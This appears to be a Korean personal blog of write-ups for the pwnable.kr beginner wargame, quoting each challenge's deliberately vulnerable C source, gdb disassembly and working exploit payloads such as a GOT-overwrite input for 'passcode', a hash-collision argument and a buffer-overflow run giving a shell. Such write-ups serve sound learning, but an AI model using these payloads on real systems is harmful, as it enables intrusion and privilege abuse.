M4ndU의 만두만두한 블로그

mistake - 1 pt

We all make mistakes, let's move on.

(don't take this too seriously, no fancy hacking skill is required at all)

This task is based on real event

Thanks to dhmonkey

hint : operator priority

ssh mistake@pwnable.kr -p2222 (pw:guest)

mistake@ubuntu:~$ ls -l

total 24

-r-------- 1 mistake_pwn root      51 Jul 29  2014 flag

-r-sr-x--- 1 mistake_pwn mistake 8934 Aug  1  2014 mistake

-rw-r--r-- 1 root        root     792 Aug  1  2014 mistake.c

-r-------- 1 mistake_pwn root      10 Jul 29  2014 password

mistake@ubuntu:~$ cat mistake.c

#include <stdio.h>

#include <fcntl.h>

#define PW_LEN 10

#define XORKEY 1

void xor(char* s, int len){

int i;

for(i=0; i<len; i++){

s[i] ^= XORKEY;

}

}

int main(int argc, char* argv[]){

int fd;

if(fd=open("/home/mistake/password",O_RDONLY,0400) < 0){

printf("can't open password %d\n", fd);

return 0;

}

printf("do not bruteforce...\n");

sleep(time(0)%20);

char pw_buf[PW_LEN+1];

int len;

if(!(len=read(fd,pw_buf,PW_LEN) > 0)){

printf("read error\n");

close(fd);

return 0;

}

char pw_buf2[PW_LEN+1];

printf("input password : ");

scanf("%10s", pw_buf2);

// xor your input

xor(pw_buf2, 10);

if(!strncmp(pw_buf, pw_buf2, PW_LEN)){

printf("Password OK\n");

system("/bin/cat flag\n");

}

else{

printf("Wrong Password\n");

}

close(fd);

return 0;

}

if(fd=open("/home/mistake/password",O_RDONLY,0400) < 0)

if(!(len=read(fd,pw_buf,PW_LEN) > 0))

scanf("%10s", pw_buf2);

mistake@ubuntu:~$ ./mistake 

do not bruteforce...

1111111111

input password : 0000000000

Password OK

Mommy, the operator priority always confuses me :(

leg - 2 pt

Daddy told me I should study arm.

But I prefer to study my leg!

Download : http://pwnable.kr/bin/leg.c

Download : http://pwnable.kr/bin/leg.asm

ssh leg@pwnable.kr -p2222 (pw:guest)

cpu가 명령어 하나를 수행할 때 fetch > decode > execute 의 과정을 거친다고 합니다.

2개의 opcode를 실행하려면 fetch > decode > execute > fetch > decode > execute 총 6번의 작업이 필요하죠.

하지만 pipe line라는 것을 이용해서

이렇게 병렬적으로 단계를 수행하면 2개의 opcode를 실행할때 6번의 작업이 필요했던것을 4번으로 줄일 수 있습니다.

직렬보다 효율적이죠.

pc는 fetch할 주소를 담고 있습니다.

현재 명령어가 execute단계라면, 다음 명령어는 decode단계, 그 다음 명령어는 fetch 단계이겠죠.

그래서 pc는 다다음번째 명령어의 주소를 담고 있게 됩니다.

key1 | 0x8ce4

key2 | 0x8d0c

key3 | 0x8d80

/ $ ./leg

Daddy has very strong arm! : 108400 

Congratz!

My daddy has a lot of ARMv5te muscle!

input - 4 pt

Mom? how can I pass my input to a computer program?

ssh input2@pwnable.kr -p2222 (pw:guest)

input2@ubuntu:~$ ls -l

total 24

-r--r----- 1 input2_pwn root      55 Jun 30  2014 flag

-r-sr-x--- 1 input2_pwn input2 13250 Jun 30  2014 input

-rw-r--r-- 1 root       root    1754 Jun 30  2014 input.c

input2@ubuntu:~$ cat input.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <sys/socket.h>

#include <arpa/inet.h>

int main(int argc, char* argv[], char* envp[]){

printf("Welcome to pwnable.kr\n");

printf("Let's see if you know how to give input to program\n");

printf("Just give me correct inputs then you will get the flag :)\n");

// argv

if(argc != 100) return 0;

if(strcmp(argv['A'],"\x00")) return 0;

if(strcmp(argv['B'],"\x20\x0a\x0d")) return 0;

printf("Stage 1 clear!\n");

// stdio

char buf[4];

read(0, buf, 4);

if(memcmp(buf, "\x00\x0a\x00\xff", 4)) return 0;

read(2, buf, 4);

        if(memcmp(buf, "\x00\x0a\x02\xff", 4)) return 0;

printf("Stage 2 clear!\n");

// env

if(strcmp("\xca\xfe\xba\xbe", getenv("\xde\xad\xbe\xef"))) return 0;

printf("Stage 3 clear!\n");

// file

FILE* fp = fopen("\x0a", "r");

if(!fp) return 0;

if( fread(buf, 4, 1, fp)!=1 ) return 0;

if( memcmp(buf, "\x00\x00\x00\x00", 4) ) return 0;

fclose(fp);

printf("Stage 4 clear!\n");

// network

int sd, cd;

struct sockaddr_in saddr, caddr;

sd = socket(AF_INET, SOCK_STREAM, 0);

if(sd == -1){

printf("socket error, tell admin\n");

return 0;

}

saddr.sin_family = AF_INET;

saddr.sin_addr.s_addr = INADDR_ANY;

saddr.sin_port = htons( atoi(argv['C']) );

if(bind(sd, (struct sockaddr*)&saddr, sizeof(saddr)) < 0){

printf("bind error, use another port\n");

    return 1;

}

listen(sd, 1);

int c = sizeof(struct sockaddr_in);

cd = accept(sd, (struct sockaddr *)&caddr, (socklen_t*)&c);

if(cd < 0){

printf("accept error, tell admin\n");

return 0;

}

if( recv(cd, buf, 4, 0) != 4 ) return 0;

if(memcmp(buf, "\xde\xad\xbe\xef", 4)) return 0;

printf("Stage 5 clear!\n");

// here's your flag

system("/bin/cat flag");

return 0;

}

// argv

if(argc != 100) return 0;

if(strcmp(argv['A'],"\x00")) return 0;

if(strcmp(argv['B'],"\x20\x0a\x0d")) return 0;

printf("Stage 1 clear!\n");

1. 인자의 개수 = 100개

2. argv['A'] = \x00

3. argv['B'] = \x20\x0a\x0d

// stdio

char buf[4];

read(0, buf, 4);

if(memcmp(buf, "\x00\x0a\x00\xff", 4)) return 0;

read(2, buf, 4);

        if(memcmp(buf, "\x00\x0a\x02\xff", 4)) return 0;

printf("Stage 2 clear!\n");

// env

if(strcmp("\xca\xfe\xba\xbe", getenv("\xde\xad\xbe\xef"))) return 0;

printf("Stage 3 clear!\n");

// file

FILE* fp = fopen("\x0a", "r");

if(!fp) return 0;

if( fread(buf, 4, 1, fp)!=1 ) return 0;

if( memcmp(buf, "\x00\x00\x00\x00", 4) ) return 0;

fclose(fp);

printf("Stage 4 clear!\n");

// network

int sd, cd;

struct sockaddr_in saddr, caddr;

sd = socket(AF_INET, SOCK_STREAM, 0);

if(sd == -1){

printf("socket error, tell admin\n");

return 0;

}

saddr.sin_family = AF_INET;

saddr.sin_addr.s_addr = INADDR_ANY;

saddr.sin_port = htons( atoi(argv['C']) );

if(bind(sd, (struct sockaddr*)&saddr, sizeof(saddr)) < 0){

printf("bind error, use another port\n");

     return 1;

}

listen(sd, 1);

int c = sizeof(struct sockaddr_in);

cd = accept(sd, (struct sockaddr *)&caddr, (socklen_t*)&c);

if(cd < 0){

printf("accept error, tell admin\n");

return 0;

}

if( recv(cd, buf, 4, 0) != 4 ) return 0;

if(memcmp(buf, "\xde\xad\xbe\xef", 4)) return 0;

printf("Stage 5 clear!\n");

input2@ubuntu:~$ cd /tmp

input2@ubuntu:/tmp$ mkdir m4ndu

input2@ubuntu:/tmp$ cd m4ndu

input2@ubuntu:/tmp/m4ndu$ vi ex.py

input2@ubuntu:/tmp/m4ndu$ python ex.py

[+] Starting local process '/home/input2/input': Done

[+] Opening connection to localhost on port 40000: Done

[*] Switching to interactive mode

Welcome to pwnable.kr

Let's see if you know how to give input to program

Just give me correct inputs then you will get the flag :)

Stage 1 clear!

Stage 2 clear!

Stage 3 clear!

Stage 4 clear!

Stage 5 clear!

[*] Process '/home/input2/input' stopped with exit code 0

[*] Got EOF while reading in interactive

$

input2@ubuntu:/tmp/m4ndu$ ln -s /home/input2/flag flag

input2@ubuntu:/tmp/m4ndu$ ls

flag

input2@ubuntu:/tmp/m4ndu$ vi exex.py

[2]+  Stopped                 vi exex.py

input2@ubuntu:/tmp/m4ndu$ vi ex.py

input2@ubuntu:/tmp/m4ndu$ python ex.py 

[+] Starting local process '/home/input2/input': Done

[+] Opening connection to localhost on port 40000: Done

[*] Switching to interactive mode

Welcome to pwnable.kr

Let's see if you know how to give input to program

Just give me correct inputs then you will get the flag :)

Stage 1 clear!

Stage 2 clear!

Stage 3 clear!

Stage 4 clear!

Stage 5 clear!

Mommy! I learned how to pass various input in Linux :)

[*] Got EOF while reading in interactive

$  

random - 1 pt

Daddy, teach me how to use random value in programming!

ssh random@pwnable.kr -p2222 (pw:guest)

random@ubuntu:~$ ls -l

total 20

-r--r----- 1 random_pwn root     49 Jun 30  2014 flag

-r-sr-x--- 1 random_pwn random 8538 Jun 30  2014 random

-rw-r--r-- 1 root       root    301 Jun 30  2014 random.c

random@ubuntu:~$ cat random.c

#include <stdio.h>

int main(){

unsigned int random;

random = rand(); // random value!

unsigned int key=0;

scanf("%d", &key);

if( (key ^ random) == 0xdeadbeef ){

printf("Good!\n");

system("/bin/cat flag");

return 0;

}

printf("Wrong, maybe you should try 2^32 cases.\n");

return 0;

}

random@ubuntu:~$ gdb -q random

Reading symbols from random...(no debugging symbols found)...done.

(gdb) set disassembly-flavor intel

(gdb) disas main

   0x000000000040062c <+56>: xor    eax,DWORD PTR [rbp-0x4]

   0x000000000040062f <+59>: cmp    eax,0xdeadbeef

random@ubuntu:~$ ./random 

3039230856

Good!

Mommy, I thought libc random is unpredictable...

passcode - 10 pt 

Mommy told me to make a passcode based login system.

My initial C code was compiled without any error!

Well, there was some compiler warning, but who cares about that?

ssh passcode@pwnable.kr -p2222 (pw:guest)

passcode@ubuntu:~$ ls -l

total 16

-r--r----- 1 root passcode_pwn   48 Jun 26  2014 flag

-r-xr-sr-x 1 root passcode_pwn 7485 Jun 26  2014 passcode

-rw-r--r-- 1 root root          858 Jun 26  2014 passcode.c

passcode@ubuntu:~$ cat passcode.c

#include <stdio.h>

#include <stdlib.h>

void login(){

int passcode1;

int passcode2;

printf("enter passcode1 : ");

scanf("%d", passcode1);

fflush(stdin);

// ha! mommy told me that 32bit is vulnerable to bruteforcing :)

printf("enter passcode2 : ");

        scanf("%d", passcode2);

printf("checking...\n");

if(passcode1==338150 && passcode2==13371337){

                printf("Login OK!\n");

                system("/bin/cat flag");

        }

        else{

                printf("Login Failed!\n");

exit(0);

        }

}

void welcome(){

char name[100];

printf("enter you name : ");

scanf("%100s", name);

printf("Welcome %s!\n", name);

}

int main(){

printf("Toddler's Secure Login System 1.0 beta.\n");

welcome();

login();

// something after login...

printf("Now I can safely trust you that you have credential :)\n");

return 0;

}

scanf("%d", passcode1);

scanf("%d", passcode2);

   0x0804862f <+38>: lea    edx,[ebp-0x70]

   0x08048632 <+41>: mov    DWORD PTR [esp+0x4],edx

   0x08048636 <+45>: mov    DWORD PTR [esp],eax

   0x08048639 <+48>: call   0x80484a0 <__isoc99_scanf@plt>

   0x0804857c <+24>: mov    edx,DWORD PTR [ebp-0x10]

   0x0804857f <+27>: mov    DWORD PTR [esp+0x4],edx

   0x08048583 <+31>: mov    DWORD PTR [esp],eax

   0x08048586 <+34>: call   0x80484a0 <__isoc99_scanf@plt>

   0x08048593 <+47>: call   0x8048430 <fflush@plt>

-----

(gdb) x/i 0x8048430

   0x8048430 <fflush@plt>: jmp    DWORD PTR ds:0x804a004

(gdb) x/i 0x804a004

   0x804a004 <fflush@got.plt>: test   BYTE PTR ss:[eax+ecx*1],al

   0x080485de <+122>: call   0x8048450 <puts@plt>

   0x080485e3 <+127>: mov    DWORD PTR [esp],0x80487af

   0x080485ea <+134>: call   0x8048460 <system@plt>

(python -c 'print "D"*96 + "\x04\xa0\x04\x08"'; cat) | ./passcode

passcode@ubuntu:~$ (python -c 'print "D"*96 + "\x04\xa0\x04\x08"'; cat) | ./passcode

Toddler's Secure Login System 1.0 beta.

enter you name : Welcome DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD�!

134514147

Sorry mom.. I got confused about scanf usage :(

enter passcode1 : Now I can safely trust you that you have credential :)

flag - 7 pt [writeup] 

Papa brought me a packed present! let's open it.

Download : http://pwnable.kr/bin/flag

This is reversing task. all you need is binary

>>>>./upx -d ./flag

                       Ultimate Packer for eXecutables

                          Copyright (C) 1996 - 2017

UPX 3.94w       Markus Oberhumer, Laszlo Molnar & John Reiser   May 12th 2017

        File size         Ratio      Format      Name

   --------------------   ------   -----------   -----------

    883745 <-    335288   37.94%   linux/amd64   flag

Unpacked 1 file.

bof - 5 pt [writeup] 

Nana told me that buffer overflow is one of the most common software vulnerability. 

Is that true?

Download : http://pwnable.kr/bin/bof

Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

mandu@mandu-VirtualBox:~/Downloads$ gdb -q bof

Reading symbols from bof...(no debugging symbols found)...done.

(gdb) set disassembly-flavor intel

(gdb) disas func

Dump of assembler code for function func:

   0x0000062c <+0>: push   ebp

   0x0000062d <+1>: mov    ebp,esp

   0x0000062f <+3>:   sub    esp,0x48

   0x00000632 <+6>: mov    eax,gs:0x14

   0x00000638 <+12>: mov    DWORD PTR [ebp-0xc],eax

   0x0000063b <+15>: xor    eax,eax

   0x0000063d <+17>: mov    DWORD PTR [esp],0x78c

   0x00000644 <+24>: call   0x645 <func+25>

   0x00000649 <+29>: lea    eax,[ebp-0x2c]

   0x0000064c <+32>: mov    DWORD PTR [esp],eax

   0x0000064f <+35>: call   0x650 <func+36>

   0x00000654 <+40>: cmp    DWORD PTR [ebp+0x8],0xcafebabe

   0x0000065b <+47>: jne    0x66b <func+63>

   0x0000065d <+49>: mov    DWORD PTR [esp],0x79b

   0x00000664 <+56>: call   0x665 <func+57>

   0x00000669 <+61>: jmp    0x677 <func+75>

   0x0000066b <+63>: mov    DWORD PTR [esp],0x7a3

   0x00000672 <+70>: call   0x673 <func+71>

   0x00000677 <+75>: mov    eax,DWORD PTR [ebp-0xc]

   0x0000067a <+78>: xor    eax,DWORD PTR gs:0x14

   0x00000681 <+85>: je     0x688 <func+92>

   0x00000683 <+87>: call   0x684 <func+88>

   0x00000688 <+92>: leave  

   0x00000689 <+93>: ret    

End of assembler dump.

mandu@mandu-VirtualBox:~/project/pwnkr$ python bof.py 

[+] Opening connection to pwnable.kr on port 9000: Done

bof

bof.c

flag

log

log2

super.pl

daddy, I just pwned a buFFer :)

[*] Closed connection to pwnable.kr port 9000

col@ubuntu:~$ ls -l

total 16

-r-sr-x--- 1 col_pwn col     7341 Jun 11  2014 col

-rw-r--r-- 1 root    root     555 Jun 12  2014 col.c

-r--r----- 1 col_pwn col_pwn   52 Jun 11  2014 flag

col@ubuntu:~$ cat col.c

#include <stdio.h>

#include <string.h>

unsigned long hashcode = 0x21DD09EC;

unsigned long check_password(const char* p){

int* ip = (int*)p;

int i;

int res=0;

for(i=0; i<5; i++){

res += ip[i];

}

return res;

}

int main(int argc, char* argv[]){

if(argc<2){

printf("usage : %s [passcode]\n", argv[0]);

return 0;

}

if(strlen(argv[1]) != 20){

printf("passcode length should be 20 bytes\n");

return 0;

}

if(hashcode == check_password( argv[1] )){

system("/bin/cat flag");

return 0;

}

else

printf("wrong passcode.\n");

return 0;

}

col@ubuntu:~$ ./col `python -c 'print "\x01\x01\x01\x01"*4+"\xE8\x05\xD9\x1D"'`

daddy! I just managed to create a hash collision :)

fd@ubuntu:~$ ls -l

total 16

-r-sr-x--- 1 fd_pwn fd   7322 Jun 11  2014 fd

-rw-r--r-- 1 root   root  418 Jun 11  2014 fd.c

-r--r----- 1 fd_pwn root   50 Jun 11  2014 flag

fd@ubuntu:~$ cat flag

cat: flag: Permission denied

fd@ubuntu:~$ cat fd.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

char buf[32];

int main(int argc, char* argv[], char* envp[]){

if(argc<2){

printf("pass argv[1] a number\n");

return 0;

}

int fd = atoi( argv[1] ) - 0x1234;

int len = 0;

len = read(fd, buf, 32);

if(!strcmp("LETMEWIN\n", buf)){

printf("good job :)\n");

system("/bin/cat flag");

exit(0);

}

printf("learn about Linux file IO\n");

return 0;

}

fd@ubuntu:~$ ./fd 4660

LETMEWIN

good job :)

mommy! I think I know what a file descriptor is!!